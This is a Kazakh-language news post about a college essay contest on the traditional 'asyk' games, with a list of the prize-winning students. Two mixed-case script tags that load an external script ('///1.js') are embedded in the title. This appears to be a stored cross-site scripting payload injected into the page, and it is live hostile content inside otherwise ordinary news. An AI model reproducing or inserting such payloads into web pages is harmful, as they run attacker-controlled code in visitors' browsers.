БІРТҰТАС ТӘРБИЕ БАҒДАРЛАМАСЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.12.2023
Ұлттық мүдде: ұлттық мирасты, мәдениетті дәріптеу.
Талап: сыни және креативті ойлау, жеке және командамен жұмыс істей білу және физикалық белсенді болу.
2023 жылдың 30 қараша күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Асық ату», «Бес асық» ұлттық ойындарын насихаттау мақсатында «Асық ойынының ерекшеліктері мен пайдасы» тақырыбындағы шығарма жазу байқауы өтті. Негізгі міндет – білім алушылардың рухани-адамгершлік мәдениетін, эстетикалық, патриоттық сезімдерін тәрбиелеу, елдің мәдени мұрасын сақтау, төл ойындарды дәріптеу. Байқау қорытындысына сәйкес «Бастауыш мектеп» бөлімінің студенті Уаис Нұргүл жүлделі І орынды иеленсе, «Филология» бөлімінің студенті Муратова Айбарша мен «Дене мәдениеті» бөлімінің студенті Алтынбек Нұрым ІІ орынды, «Бастауыш мектеп» бөлімінің студенттері Азамат Сұлушаш, Адай Мадина мен «Информатика» бөлімінің студенті Бекен Байбұлан ІІІ орынды еншіледі.
@bilim_bolimi_kokshetau
@aqmola.oblysy.birtutas_tarbie
@medetbekovameruert
Просмотров: 508


Пікір қосу



Деректерді қолтаңбаға қосу